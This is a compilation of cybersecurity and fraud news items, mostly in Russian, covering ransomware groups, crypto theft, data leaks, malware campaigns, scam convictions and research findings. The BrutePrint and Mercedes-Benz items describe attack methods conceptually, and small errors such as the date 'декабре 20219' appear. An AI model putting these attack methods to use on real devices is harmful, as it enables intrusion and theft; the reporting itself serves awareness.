Хотя кибервымогатели часто проводят ребрендинг своих операций, когда внимание к ним со стороны правоохранительных органов усиливается, BlackCat (она же Alphv) – это своего рода «супергруппа», состоящая из партнеров разных кибервымогательских группировок.
BlackCat впервые появилась в ноябре 2021 года и с тех пор атаковала несколько организаций по всему миру. Многие эксперты видели в ней сходство с BlackMatter – кибервымогательской группировкой, возникшей на «останках» печально известной DarkSide, атаковавшей Colonial Pipeline в мае 2021 года.
В интервью изданию The Record в прошлом месяце представитель BlackCat заявил, что слухи, будто группировка является новым названием BlackMatter, не соответствуют действительности. Однако он отметил, что BlackCat состоит из партнеров разных RaaS.
«Частично мы связаны с gandrevil [GandCrab/REvil], blackside [BlackMatter/DarkSide], mazegreggor [Maze/Egregor], lockbit, и пр., поскольку являлись их партнерами. Мы позаимствовали их плюсы и устранили минусы», – сообщил представитель группировки.
По словам специалистов Cisco Talos, похоже, BlackCat – пример вертикального расширения бизнеса.
«По сути, это способ контролировать восходящую цепочку поставок, делая сервис, являющийся ключевым для их бизнеса (оператора RaaS), более подходящим для их нужд и добавляя еще один источник дохода», – пояснили исследователи.
Более того, эксперты обнаружили целый ряд общих черт между атакой BlackMatter в сентябре 2021 года и атакой BlackCat в декабре 2021 года, включая используемые инструменты и имена файлов, а также домен для поддержания постоянного доступа ко взломанным сетям.
Использование одного и того же C&C-адреса может свидетельствовать о том, что партнер BlackMatter, вероятно, был одним из первых, кто внедрил BlackCat, поскольку для достижения стадии шифрования обеим атакам потребовалось более 15 дней.
«Как мы уже неоднократно видели, RaaS-сервисы приходят и уходят. Однако их партнеры, скорее всего, просто переходят на новый сервис. А с ними сохраняются и многие TTP», – пояснили исследователи.
source: blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat- analyzing.html
Известный хакер снова начал продавать криптовалюту. Заработал уже $1 млн
Злоумышленник избавился от токенов Huobi Token, Route, Rio Fuel, Polygon, REVV, Clearpool и MAPS на децентрализованной криптобирже Uniswap
Хакер, который в декабре 2021 года взломал биржу AscendEX и вывел с нее активы более чем на $77 млн, возобновил продажу похищенной криптовалюты. В ночь на 18 февраля злоумышленник продал токены Huobi Token, Route, Rio Fuel, Polygon, REVV, Clearpool и MAPS более чем на $1 млн. Все продажи проходили на децентрализованной криптобирже Uniswap. На 10:20 мск на кошельке хакера остаются активы на $11,8 млн.
После взлома AscendEX злоумышленник разделил похищенные активы между тремя адресами и продал часть криптовалюты на $140 тыс. В декабре 2021 года представители биржи AscendEX подтвердили факт взлома «горячих» кошельков Ethereum, Polygon и Binance Smart Chain (BSC). Аналитическая компания PeckShield подсчитала, что хакер похитил более $77,7 млн в различных токенах.
Криптобиржа AscendEX была основана в 2018 году и изначально имела название BitMax. В марте 2021 года торговая платформа провела ребрендинг и привлекла финансирование в размере $50 млн от Polychain Capital, Hack VC и других компаний.
В 2021 году эксперты в области кибербезопасности зафиксировали самое большое за всю историю число эксплуатаций уязвимостей нулевого дня. Согласно базам данных, таким как 0-day tracking project , в этом году было обнаружено не менее 66 случаев использования уязвимостей нулевого дня — почти вдвое больше, чем в 2020 году, и больше, чем в любой другой год.
Одним из факторов, способствующих увеличению количества сообщений о 0Day- уязвимостях, является быстрое глобальное распространение хакерских инструментов. На вершине киберпреступности находятся хакеры, спонсируемые государством. Предполагается, что только китайские хакеры несут ответственность за девять случаев эксплуатации уязвимостей нулевого дня в этом году. США и их союзники явно обладают одними из самых изощренных хакерских возможностей, и все чаще говорят о более агрессивном использовании этих инструментов.
По словам экспертов, приобрести сведения о 0Day-уязвимости на растущем рынке эксплоитов стало проще, чем когда-либо. То, что когда-то было чрезмерно дорогим, теперь более доступно.
«Мы видели, как эти APT-группировки группы обращаются в NSO Group или Candiru, эти все более известные компании, позволяющие странам обменивать финансовые ресурсы на наступательные возможности», — сообщили эксперты.
В последние годы киберпреступники использовали уязвимости нулевого дня для финансовой выгоды (например, в июльской кибератаке на американского MSP- провайдера Kaseya), запуская программы-вымогатели на системах жертв. По словам экспертов, одна треть отслеживаемых уязвимостей нулевого дня может быть напрямую связана с финансово мотивированными участниками.
Даже если «нулевые дни» наблюдаются чаще, чем когда-либо, их становится все труднее и дороже эксплуатировать. Улучшение и усложнение систем защиты привело к тому, что хакерам приходится выполнять больше работы по взлому, чем десять лет назад. Сталкиваясь с улучшением защиты, хакерам часто приходится связывать несколько эксплоитов вместо одного. Эти «цепочки эксплоитов» требуют большего количества уязвимостей нулевого дня.
Как отметили эксперты, злоумышленники «вынуждены больше инвестировать и больше рисковать для достижения своих целей». Одним из важных сигналов является рост стоимости наиболее ценных эксплоитов. За последние три года стоимость самых серьезных взломов выросла на 1150%.
На сайте вымогателя DopplePaymer появилась большая подборка файлов, похищенных у генеральной прокуратуры штата Иллинойс. Дело в том, что официальные лица отказались платить выкуп злоумышленникам, сообщает издание The Record.


Среди опубликованных хакерами файлов можно найти информацию о судебных делах, генеральной прокуратуры Иллинойса, в том числе личные документы, которые не фигурируют в публичных записях. Кроме того, среди украденных данных есть личная информацию о заключенных тюрем штата, их жалобах и делах.
Атака произошла 10 апреля 2021 года. Официально об инциденте сообщили три дня спустя, 13 апреля. Первичное заявление прокуратуры было кратким: в нем лишь упоминалось, что сеть была взломана. Как стало известно позже, 21 апреля, инцидент оказался атакой шифровальщика DopplePaymer: операторы малвари взяли на себя ответственность за случившееся и обнародовали несколько файлов, похищенных у правоохранителей.
Больше ворованных данных появилось на сайте преступников на этой неделе, когда переговоры в выкупе зашли в тупик.
Собственные источники The Record говорят, что исторически большинство переговоров DopplePaymer терпят неудачу и прекращаются, когда жертвы понимают, что выплата выкупа влечет за собой большие юридические сложности.
Дело в том, что в декабре 20219 года Министерство финансов США внесло хак- группу Evil Corp в свой список иностранных организаций, подпадающих под санкции. Это случилось вскоре после того, как Минюст предъявил обвинения двум участникам Evil Corp. Так как многие ИБ-эксперты давно связывают вымогателя DopplePaymer с группой EvilCorp, любые виды платежей и финансовых транзакций со стороны американских организаций в отношении этой группы запрещены.
При этом Министерство финансов сообщало, что оно открыто для утверждения некоторых транзакций, если жертвы обратятся к ним за помощью и одобрением, чего прокуратура штата Иллинойс, очевидно, не сделала.
Источник: xakep.ru/2021/04/29/dopplepaymer-oag/
Издание Bleeping Computer сообщает, что сотрудники Nvidia предлагают пользователям откатиться к более ранним версиям Windows 10, чтобы решить проблемы с играми, с недавних пор возникающие при использовании видеокарт компании. Дело в том, что после апрельского «вторника обновлений» многие геймеры жалуются на падение FPS и постоянные повисания во время игры.
Например, пользователи пишут на Reddit, что после установки последних обновлений в их системах с RTX 3075 появились проблемы. Сначала пострадавшие думали, что патчи повредили ОС или графический драйвер, но переустановки не помогли.
«У меня появилась огромная проблема при использовании vsync. Когда vsync активен, невозможно поддерживать стабильные 60 кадров в секунду. FPS падает как сумасшедший до 55 или 40 кадров. Без vsync та же игра рендерится со скоростью 180+ кадров в секунду. <…> Не буду устанавливаться никаких обновлений, пока это не поправят», — рассказывает один из пользователей.
Click to expand...
Аналогичные сообщения можно найти в социальных сетях, в Windows 10 Feedback Hub, на форумах Microsoft Community и BleepingComputer, а также на форумах Nvidia.
Как вскоре заметили на портале WindowsLatest, в ответ на эти жалобы сотрудники Nvidia предлагают пользователям откатить систему, удалив обновление KB5000842 от марта 2021 года.
Беда в том, что KB5000842 содержит те же патчи для Windows 10, что и апрельское обновление KB5001330, но без исправлений безопасности. А в апреле 2021 года Microsoft устранила более 100 уязвимостей в своих продуктах, то есть удалять или не устанавливать это обновление крайне не рекомендуется.
Bleeping Computer советует пользователям подождать: на днях разработчики Microsoft должны выпустить еще одно предварительное накопительное обновление, и тогда пользователи смогут проверить, решает ли оно проблемы с играми.
Источник: xakep.ru/2021/04/23/win-10-nvidia/
В минувшие выходные в даркнете были опубликованы данные 533 313 128 пользователей Facebook. Этот дамп включает в себя номера телефонов, имена, Facebook ID, email-адреса, информацию о местоположении, поле, дате рождения, работе и другие данные, которые могли содержать профили социальной сети.
От прочих эту утечку отличал тот факт, что она содержала не только данные из общедоступных профилей, но и номера телефонов, связанные с этими с учетными записями.

По мнению ИБ-экспертов, еще в 2019 году злоумышленники воспользовались
уязвимостью, связанной с функцией «Добавить друга», которая позволила получить
доступ к телефонным номерам. Этот баг уже давно исправлен. Представители
Facebook подтвердили факт утечки, но заявили, что «это старые данные, о
которых ранее сообщалось в 2019 году».
В свежем заявлении компании и вовсе говорится, что утечка связана не с какой- либо уязвимостью или взломом, но с обычным скраппингом данных. То есть в 2019 году мошенники, «которые намеренно нарушают политику платформы», просто собрали информацию из открытых профилей пользователей, злоупотребляя для этого функций импорта контактов.
Агрегатор утечек Have I Been Pwned уже добавил утечку в свою базу. То есть любой желающий может проверить, коснулась ли его эта проблема. Причем сначала проверка была возможна только по email-адресу, однако только 2,5 миллиона записей из 533 миллионов включали адрес электронной почты. То есть поиск по email-адресу чаще всего не давал результатов.
В итоге основатель ресурса Трой Хант добавил на HIBP возможность искать по номерам телефонов, хотя это была нетривиальная задача из-за разных форматов номеров. Поиск по номеру телефона производится с добавлением кода конкретной страны и региона, как показано на иллюстрации ниже.

Источник: xakep.ru/2021/04/07/hibp-facebook/
10:47 am
3 minute read
[ Write a comment](https://threatpost.com/android-devices-lodarat-
windows/163769/?web_view=true#discussion)
Share this article:
The LodaRAT - known for targeting Windows devices - has been discovered also
targeting Android devices in a new espionage campaign.
A newly discovered variant of the LodaRAT malware, which has historically
targeted Windows devices, is being distributed in an ongoing campaign that now
also hunts down Android devices and spies on victims.
Along with this, an updated version of LodaRAT for Windows has also been
identified; both versions were seen in a recent campaign targeting Bangladesh,
researchers said.
The campaign reflects an overarching shift in strategy for LodaRAT's
developers, as the attack appears to be driven by espionage rather than its
previous financial goals. While previous versions of LodaRAT contained
credential-stealing capabilities that researchers speculated were used for
draining victims' bank accounts, these newer versions come with a full roundup
of information-gathering commands.
Аналитики компании Google изучили 0-day уязвимости, обнаруженные ими в 2020 году, и пришли к выводу, что почти четверть проблем – это новые вариации уже известных багов, ранее получавших патчи. Авторы отчета пишут, что многих проблем можно было избежать, если бы разработчики сразу исправляли свои продукты более тщательно.
В 2020 году, благодаря работе команды Google Project Zero, в общей сложности было выявлено 24 уязвимости нулевого дня, которые активно использовали хакеры. Шесть из них (в Chrome, Firefox, Internet Explorer, Safari и Windows) оказались новыми версиями ранее известных уязвимостей. Просто злоумышленники внимательно изучили старые баг-репорты, разобрались в исходных проблемах, а затем создали для них новые версии эксплоитов.

«В некоторых эксплоитах достаточно было изменить одну или две строки кода, чтобы получить новый работающий эксплоит для уязвимости нулевого дня», — рассказывают эксперты.
Click to expand...
Кроме того, еще три проблемы, обнаруженные в прошлом году и затрагивавшие Chrome, Internet Explorer и Windows, были исправлены не полностью, то есть в итоге потребовали дополнительных патчей. По сути, если бы хакеры внимательно изучили вышедшие исправления, они могли бы обнаружить способ, позволяющий им продолжить эксплуатацию багов и атаки.

Эксперты Google Project Zero советуют своим коллегам глубже анализировать 0-day уязвимости и учиться работать с такими проблемами. Когда-то команда Google Project Zero создавалась именно для поиска и исследования уязвимостей нулевого дня, и теперь ее специалисты говорят, что 0-day баги – это своего рода «окно», позволяющее заглянуть в головы злоумышленников, узнать как можно больше о возможных векторах атаки, классах проблем и способах борьбы с ними.
Источник: xakep.ru/2021/02/04/not-so-zero-day/
Разработчики поисковика DuckDuckGo создали email-сервис, удаляющий из входящих сообщений любые трекеры, которые, к примеру, помогают составлять профили пользователей для таргетированной рекламы. Пользователи сервиса получают бесплатный адрес на @duck.com, где письма очищаются от трекеров, после чего пересылаются в обычный почтовый ящик.
В настоящее время сервис заработал в режиме закрытого бета-теста. Пока воспользоваться им можно только встав в «очередь» через специальный список ожидания, новые заявки в который принимаются ежедневно.
Разного рода трекеры могут сообщать отправителям электронной почты, когда пользователь открывает их сообщение, и помогают рекламным компаниям создать профиль человека на основании собранных метаданных (какое устройство использовали для чтения письма, когда его открыли, данные о местоположении и так далее). Хуже того, эти данные в итоге могут попасть в руки третьих лиц.
«Если вы используете почтовый сервис, такой как Gmail или Yahoo, это не проблема! Электронные письма, отправленные на ваш личный Duck-адрес, будут приходить туда, как обычно, так что вы сможете читать свою электронную почту, как обычно, в любом приложении или в интернете, без проблем», — говорят разработчики DuckDuckGo.
Также новый сервис будет предоставлять одноразовые почтовые ящики, к примеру, для использования на недоверенных сайтах, которые могут навязчиво спамить сообщениями или делиться email-адресами с кем-то еще.
В DuckDuckGo уверяют, что сервис ни в коем случае «не будет сохранять ваши электронные письма», а почта вообще будет только обрабатываться в памяти. Так, получив email, сервис удалит из него скрытые трекеры и перешлет на указанный адрес, даже не сохранив сопутствующие заголовки, например, с указанием отправителей и получателей.
Конечный адрес получателя — это единственная личная информация, которую DuckDuckGo будет сохранять (по понятным причинам). Но если пользователь захочет удалить свою учетную запись, его email-адрес в итоге тоже будет удален из системы в течение 30 дней.
• Source: https://spreadprivacy.com/introducing-email-protection-beta/
• Тут с картинками для тупых https://www.cnews.ru/news/top/2021-07-21_sozdan_superbezopasnyj_pochtovyj
The Trickbot malware has been upgraded with a network reconnaissance module designed to survey local networks after infecting a victim's computer.
This new module, dubbed masrv, uses the open-source masscan tool, a mass port scanner with its own TCP/IP stack and capable of scanning large swaths of the Internet in a matter of minutes.
Trickbot uses the network scanner module to map the victims' networks and send home information on any devices with open ports.
The module is deployed as a Windows DLL file, with a 32-bit or 64-bit architecture depending on the system the malware has infected.
"Both DLLs we observed are debug builds and log their execution into standard output," as Kryptos Logic Vantage Team said in a report published on Monday.
This hints at the module being in a test phase, with Trickbot gang still testing waters to see if using a network mapping could help them boost the number of infected devices and their malware's efficiency.
All the info on network devices with open ports is exfiltrated to the
malware's command-and-control server for the malware operators to decide if
the discovered machines are worth adding to the botnet.
The TrickBot gang has previously released a standalone reconnaissance tool
known as LightBot in the form of a PowerShell script used for scoping out an
infected victim's network for high-value targets.
"This new module is an indication of the actor’s continued investment in improving their network reconnaissance toolkit, even after recent disruption efforts," the Kryptos Logic researchers added.
Microsoft and other security firms disrupted the Trickbot botnet following a
coordinated operation that led to the takedown of Trickbot C2 servers in
October 2020.
Even though this operation managed to disable roughly 94% of Trickbot’s
critical infrastructure, the tough to kill botnet bounced back in January
2021 with a
new series of phishing emails and lures.
Trickbot is a malware strain that surfaced in October 2016 as modular banking malware. Since then, it was continuously upgraded with new modules and features.
Although initially used only for harvesting sensitive data, Trickbot has evolved into a highly dangerous and prevalent malware dropper that will deliver additional, usually a lot more dangerous, malware payloads.
This usually happens after all useful information — including system info, credentials, and any interesting files — has been already collected and exfiltrated.
Trickbot is particularly dangerous to enterprises since it propagates through corporate networks and, if it gets admin access to a domain controller, it will steal the Active Directory database to collect more network credentials.
Last month, Trickbot's developers have added another new module designed to probe infected devices for UEFI vulnerabilities, which would give the malware ultimate control over compromised machines.
With access to the UEFI firmware, the Trickbot gang would be able to establish persistence that can't be removed even after operating system reinstalls or storage drives replacements.
В Южном округе Нью-Йорка завершился судебный процесс над Винотом Понмараном, организатором крупной мошеннической схемы с технической поддержкой. Суд приговорил его к семи годам лишения свободы за обман более 6 500 человек в США и Канаде. Используя социальную инженерию и технические уловки, возглавляемая им преступная группировка похитила в общей сложности свыше 6 миллионов долларов.
Схема мошенничества была тщательно продумана и нацелена преимущественно на пожилых людей – наиболее уязвимую категорию пользователей компьютеров. Выглядела она так: на экранах компьютеров жертв появлялись всплывающие окна, утверждающие, что их устройство заражено вирусом. В окнах предлагалось позвонить по указанному номеру для получения технической поддержки. В некоторых случаях жертвам угрожали, что перезапуск или отключение компьютера может привести к серьезным повреждениям системы и полной потере данных. В целях придания видимости легитимности, в некоторых всплывающих окнах использовались логотипы известных технологических компаний без их разрешения. Фактически, никаких вирусов на компьютерах жертв не было, а номера телефонов техподдержки, указанные в окнах, не имели отношения к легитимным компаниям.
Попадая на уловку, жертвы платили за «ремонт», который заключался в удаленном доступе к их компьютерам и запуске бесплатного антивирусного инструмента, доступного в интернете. Таким образом, жертвам навязывали оплату за несуществующие услуги.
Понмаран играл ключевую роль в этой преступной схеме. Он управлял колл-центром в Индии, который предоставлял жертвам фиктивные услуги техподдержки. Он также вербовал сообщников в США для регистрации фиктивных корпораций и открытия банковских счетов, на которые поступали деньги от жертв. Кроме того, Понмаран отмывал полученные средства, переводя их на счета в Индии и США.
Кроме тюремного заключения, 36-летнему Понмарану, гражданину Индии, предстоит выплатить более 6 миллионов долларов в качестве возмещения ущерба.
Сообщники Понмарана, Романа Лейва и Арифул Хак, были осуждены судом в 2022 году после признания своей вины. Лейва получила 100 месяцев тюрьмы. Суд обязал её вернуть более 4,5 млн долларов, полученные от преступной деятельности, и выплатить компенсацию в размере более 2,7 млн долларов. Хак получил год и один день тюрьмы. Суд также обязал его вернуть более 38 тыс. долларов и выплатить компенсацию в размере более 470 тыс. долларов.
• Source: https://www.justice[.]gov/usao-sdny/pr/leader-tech-support-fraud- scheme-sentenced-seven-years-prison
Им грозит колония общего режима на 6 лет и 6,6 лет.
Ковровский городской суд вынес приговор двум мужчинам из Москвы и Новосибирска, которые были членами организованной преступной группы, занимавшейся созданием и распространением вредоносных компьютерных программ. С их помощью они крали свыше 16 млн рублей с банковских счетов различных организаций. Об этом сообщает прокуратура Владимирской области.
По данным следствия, преступники с марта 2018 года заражали компьютеры пользователей через поддельные сайты по бухгалтерскому учету, на которых они размещали файлы, замаскированные под официальные документы, но в действительности, содержащие вредоносное ПО. Таким образом, злоумышленники получали удаленный доступ к данным на компьютерах жертв и дистанционно похищали деньги.
Всего они украли более 16 млн рублей с расчетных счетов организаций из Ростовской, Свердловской, Вологодской и Владимирской областей.
Суд признал их виновными в четырех преступлениях по ч. 2 ст. 273 УК РФ (создание, распространение и использование вредоносных компьютерных программ, совершённые организованной группой), шести преступлениях по ч. 3 ст. 272 УК РФ (неправомерный доступ к охраняемой законом компьютерной информации) и шести преступлениях по ч. 4 ст. 159.6 УК РФ (мошенничество в сфере компьютерной информации, совершенное организованной группой в крупном и особо крупном размерах).
Приговором суда им назначено наказание в виде лишения свободы на срок 6 лет и 6 лет 6 месяцев соответственно с отбыванием в колонии общего режима.
Приговор не вступил в законную силу.
source:
epp.genproc.gov.ru/web/proc_33/mass-media/news?item=91071238
Которые создали несколько фейковых телеграм-каналов "Маргарита Симоньян", где устраивали сборы для российских военных, но все деньги шли им в карман
В полицию написала заявление сама Симоньян, после чего мошенники были найдены
Оборот по их счетам за последние полтора месяца превысил 7 млн рублей
Возбуждённо дело по части 2 статьи 159 УК РФ (Мошенничество при получении выплат), от 300 тысяч штрафа до 4 лет лишения свободы.
На время следствия мошенникам выписали подписки о невыезде.
Спасенные жертвы рассказали, в каких условиях они находились и чем они занимались.
Китайские преступные синдикаты заманили 100 000 людей со всей Азии в Камбоджу обещанием хорошей высокооплачиваемой работы. По прибытию жертв, их паспорта изымаются, а их заставляют работать в «потогонных» условиях, проводя кампании по борьбе с киберпреступностью.
По данным издания The Los Angeles Times, Камбоджа, экономика которой сильно пострадала от пандемии, позволила китайской мафии организовать масштабные киберпреступные кампании с использованием рабочей силы без последствий. Это связано с тем, что страна получает хороший доход от этой деятельности. Преступные кампании включают в себя телефонное мошенничество, поддельные ставки на спорт, мошенничество с инвестициями и другие формы киберпреступлений.
Хотя правительство Камбоджи признает, что в кампаниях участвуют не более 100 000 рабочих, оно отрицает, что жертв удерживают против их воли. Однако, некоторые жертвы, которых спасли от киберпреступников, рассказывали об избиениях и пытках за невыполнение плана, а также о том, что их продавали в другие банды.

Жители Малайзии, спасенные от торговцев людьми в Камбодже, в международном аэропорту Куала-Лумпура 6 октября
Джейкоб Симс, региональный директор Международной миссии справедливости в Камбодже, которая спасла многих жертв, сказал, что заложников заставляли отжиматься, били их электрошоком, лишали еды, запирали в темной комнате или т.д. А те, кто достигал поставленных целей и планов, награждаются большей свободой, едой, деньгами и контролем над другими жертвами.
За последние несколько месяцев международное внимание к операциям усилилось, и США недавно понизили рейтинг Камбоджи до самого низкого уровня в своем индексе торговли людьми.
source: latimes.com/world-nation/story/2022-11-01/i-was-a-slave-up- to-100-000-held-captive-by-chinese-cyber-criminals-in-cambodia
Оперативники криминальной полиции Главного управления Нацполиции в Закарпатской области и отдела противодействия киберпреступлениям в Закарпатской области Департамента киберполиции провели спецоперацию по задержанию 35-летнего злоумышленника, который является одним из организаторов мошеннической схемы, по которой аферисты выманили у 49-летней переселенки из Донецкой области, матери погибшего военнослужащего, 7,5 млн гривен. Задержание полицейские провели в Киеве, при силовой поддержке бойцов КОРДа.
Денежные средства, которыми завладели злоумышленники, женщина получила в качестве выплаты от государства в связи со смертью сына.
После того как пострадавшая получила денежную помощь, ей начали звонить неизвестные. Они убеждали, что не стоит держать деньги в банках Украины, поскольку в ближайшее время они обанкротятся. Аферисты рекомендовали женщине положить деньги на счет в финансовое учреждение за рубежом и предлагали свою помощь в этом.
Женщина согласилась на такое предложение и положила 5 миллионов гривен на криптокошельок, созданный злоумышленниками. Через некоторое время она захотела снять часть средств со «счета», однако мошенники сообщили, что эти средства арестованы и для того, чтобы их разблокировать, нужно перечислить им на счета еще определенную сумму денег. В дальнейшем, несколькими переводами, потерпевшая перевела мошенникам еще 2,5 миллиона гривен. После этого связь с мошенниками оборвалась.
Обманутая женщина обратилась за помощью в местную полицию.
Закарпатские полицейские начали расследование. Масштабные оперативные мероприятия продолжались почти 6 месяцев, поскольку мошенники выводили денежные средства через многочисленных подставных лиц и десятки специально созданных счетов, в том числе в криптобанкинге. Правоохранители детально отследили маршрут движения средств и в результате вышли на основных фигурантов этой схемы. Для раскрытия преступления были привлечены возможности киберполиции и отдела уголовного анализа ГУНП.
По состоянию на сегодня по делу проведено почти 50 обысков в разных регионах Украины: по месту жительства организаторов и их возможных сообщников. Изъят ряд важных доказательств, в частности большое количество наличных в иностранной и национальной валюте, а также дорогостоящие машины фигурантов. Один из организаторов мошеннического колл-центра уже доставлен в Закарпатье и помещен в изолятор временного содержания. Он дает показания полиции в отношении своих сообщников и сотрудничает со следствием.
При процессуальном руководстве окружной прокуратуры, следователи Ужгородского районного управления полиции сообщили задержанному о подозрении по ч. 4 ст. 190 Уголовного кодекса Украины. Также суд уже рассмотрел ходатайство относительно меры пресечения для подозреваемого. В соответствии с определением суда последний будет находиться под стражей с возможностью внесения денежного залога в размере 13 млн 285 тысяч гривен.
Сейчас оперативники устанавливают местонахождение других лиц, причастных к этому преступлению, и круг пострадавших от аферистов лиц. Следствие по делу продолжается.
Крупные атаки программ-вымогателей начинаются с доступа к устройству,
приобретенного на барахолке.
Исследователи изучили почти 700 инцидентов с программами-вымогателями на
оптовых рынках доступа (Wholesale Access Markets, WAM) — платформах, где люди
продают доступ к скомпрометированным конечным точкам, доступ по различным
удаленным протоколам, таким как RDP, и т. д.
Из 3612 атак в 2021 году, расследованных аналитиками охранной фирмы CyberSixgill , 686 атак были связаны с доступом к системе, зарегистрированной в домене организации, который продавался на WAM в течение 180 дней до атаки. 85 атак были связаны с доступом к внутренней машине, которая была скомпрометирована в течение 30 дней после атаки.
Исследователи CyberSixgill предупредили, что их данные слишком запутанные, поэтому трудно доказать причинно-следственную связь. Однако, их предварительные выводы показывают, что оптовые рынки доступа являются популярным способом, который вымогатели используют для получения доступа к сети жертвы.
По словам экспертов, пока покупатели доступа безнаказанно получают огромную прибыль, эти рынки будут продолжать вносить существенный вклад в экономику киберпреступности.
CyberSixgill сравнил WAM с брокерами начального доступа ( Initial Access Brokers, IAB ). IAB продает доступ к компаниям за сотни тысяч долларов, а WAM предлагает более дешевый доступ к определенным скомпрометированным устройствам за $10. Однако, эта небольшая первоначальная инвестиция для атаки в конечном итоге может принести миллионы.
[](https://www.securitylab.ru/upload/images/content-
img(523).png)
Сравнение между IAB и WAM
Брокеры IAB более подробно описывают жертву, в сравнении с WAM. Брокеры пишут,
как был получен доступ, что этот доступ предлагает киберпреступнику и многое
другое.
[](https://www.securitylab.ru/upload/images/content-
img(524).png)
Описание скомпрометированных конечных точек на WAM
Продавцы IAB пользуются большим доверием и имеют хорошую репутацию, которую
они пытаются поддерживать, в то время как WAM фактически являются
«барахолками». «Цены низкие, запасы огромные, а качество не гарантировано», —
говорят исследователи о WAM.
Несмотря на то, что рынки WAM являются основным инструментом вымогателей, большинство киберпреступников на рынках – неопытные хакеры. Эксперты предполагают, что большинство взломов, начавшихся на WAM, представляют из себя меньшее число действий и менее изощренные атаки.
source: cybersixgill.com/blog/ransomware-and-wholesale-access- markets-a-10-investment-can-lead-to-millions-in-profit
Группа исследователей из компании Tencent и Чжэцзянского университета (Китай) представила технику атаки BrutePrint, позволяющую обойти методы защиты от подбора отпечатков пальцев, реализованные в устройствах на базе платформы Android. В штатном режиме подбору отпечатков пальцев мешает ограничение на число попыток - после нескольких неудачных попыток разблокировки устройство приостанавливает попытки биометрической аутентификации или переходит к запросу пароля. Предложенный метод атаки позволяет организовать бесконечный неограниченный цикл подбора.
Эффективность атаки продемонстрирована для 10 Android-устройств разных производителей (Samsung, Xiaomi, OnePlus, Vivo, OPPO, Huawei), на подбор отпечатка пальца для разблокировки которых потребовалось от 40 минут до 36 часов. Атака требует физического доступа к устройству и подключения к плате специального оборудования, стоимость изготовления которого оценивается в 15 долларов. Например, метод может быть использован для разблокировки изъятых, похищенных или потерянных телефонов.
При проведении атаки могут использоваться две неисправленные уязвимости в инструментарии SFA (Smartphone Fingerprint Authentication) в сочетании с отсутствием должной защиты протокола SPI. Первая уязвимость (CAMF, Cancel- After-Match-Fail) приводит к тому, что в случае передачи некорректной контрольной суммы данных отпечатка проверка сбрасывается на финальной стадии без регистрации неудачной попытки, но с возможностью определения результата. Вторая уязвимость (MAL, Match-After-Lock) позволяет по сторонним каналам определить результат проверки, если система биометрической аутентификации переведена в режим временной блокировки после определённого числа неудачных попыток.
Указанные уязвимости можно эксплуатировать через подключение специальной платы между датчиком отпечатков пальцев и TEE-чипом (Trusted Execution Environment). Исследователями выявлена недоработка в организации защиты данных, передаваемых по шине SPI (Serial Peripheral Interface), позволившая вклиниться в канал передачи данных между датчиком и TEE, и организовать перехват снятых отпечатков и их подмену на собственные данные. Кроме организации подбора, подключение через SPI даёт возможность произвести аутентификацию по имеющейся фотографии отпечатка жертвы без создания его макета для датчика.
После снятия ограничений на число попыток для подбора был использован словарный метод, основанный на использовании коллекций изображений с отпечатками пальцев, попавших в открытый доступ в результате утечек, например, в своё время были скомпрометированы БД биометрической аутентификации Antheus Tecnologia и BioStar 2. Для повышения эффективности работы с разными изображениями отпечатков и увеличения вероятности ложной идентификации (FAR, False Acceptance Rate) задействована нейронная сеть, формирующая унифицированный поток данных с отпечатками в формате, совпадающем с форматом датчика (симуляция, что данные отсканированы родным датчиком).
Молодой человек из Харькова разработал мошеннический сценарий, который позволял ему безвозмездно завладеть чужой компьютерной техникой и заработать на этом, сдав ее в ломбард. Для осуществления данной схемы ему требовалась помощь, поэтому он посвятил в свой замысел приятеля и предложил сыграть отведенную ему роль пособника, за долю в преступном предприятии.
Суть аферы заключалась в следующем: организатор находил в интернете объявления о продаже бывших в употреблении ноутбуков и связывался с их владельцами. Выразив интерес и готовность приобрести компьютерную технику, молодой человек озвучивал свое условие: прежде чем сделать покупку, он просил провести диагностику ноутбука, чтобы убедиться в его работоспособности.
Владельцы техники, уверенные в исправном техническом состоянии своих компьютеров, соглашались на это и приносили их в условленное место, на верхнем этаже одного из торговых центров Харькова. Там их ждал второй молодой человек, задача которого была выдавать себя за сотрудника сервисного центра компании «Киевстар», в подтверждение чего он носил на груди соответствующий бейдж.
Сдав ноутбук на «диагностику», продавец и «покупатель» расходились ждать ее результатов, а подельник, выдававший себя за сотрудника сервисного центра, покидал место преступления с ноутбуком. После этого он отправлялся сдавать компьютер в ломбард, а вырученные деньги делил с изобретателем схемы.
В ходе расследования, правоохранители обнаружили заявления по нескольким идентичным инцидентам, которые были объединены в одно производство. Согласно материалам дела № 12017220060000530 ЕРДР, аферисты успели незаконно завладеть тремя ноутбуками, на общую сумму более 2 тысяч долларов.
Некоторое время молодые люди игнорировали судебные заседания, пока их не доставили туда под конвоем. Там они признали свою вину и размер причиненного потерпевшим ущерба, заработав приговор по статье 190 УКУ, ч. 2 (мошенничество, совершенное повторно) в виде 3 лет лишения свободы.
Ввиду отсутствия криминальной предыстории, реальный срок был заменен 2 годами испытательного, при условии, что за это время подсудимые не совершат новых преступлений. Помимо этого, на них возложили обязанность возместить причиненный потерпевшим ущерб, а также оплатить судебные расходы.
14:35 / 19 May, 2021
Four issues are critical and exploiting them allows code to be executed
remotely.
After an eight-month audit of the computer system code in Mercedes-Benz
vehicles, security researchers from the Tencent Security Keen Lab
identified
five vulnerabilities. Four out of five problems are critical and exploiting
them allows code to be executed remotely.
The vulnerabilities were found in the Mercedes-Benz User Experience (MBUX), an infotainment system originally introduced on A-Class vehicles in 2018, but has since been rolled out across the manufacturer's entire vehicle lineup.
Vulnerabilities (CVE-2021-23906, CVE-2021-23907, CVE-2021-23908, CVE-2021-23909, and CVE-2021-23910) allow hackers to remotely control certain vehicle functions, but without access to physical characteristics such as steering control or braking system.
The researchers found the use of an outdated Linux kernel at risk of certain attacks, vulnerabilities in the browser's built-in JavaScript engine, and the potential impact of vulnerabilities in the Wi-Fi processor, Bluetooth stack, USB functionality, or enabled third-party applications that communicate with remote servers.
Analysis of the host revealed a number of issues: heap overflow vulnerabilities, including two that can lead to memory leaks and code execution; the ability to configure a remote shell using a vulnerability in the provided browser; lack of SELinux or AppArmor, which allowed exploiting a vulnerability in the Linux kernel for privilege escalation.
After an initial compromise involving setting up a persistent web shell with superuser privileges, the researchers were able to unlock certain vehicle functions and disable anti-theft protection, implement a persistent backdoor, and even perform car-driving actions.
Experts reported the discovered vulnerabilities to Daimler (which owns Mercedes-Benz) in November 2020, and the company began distributing patches at the end of January 2021.
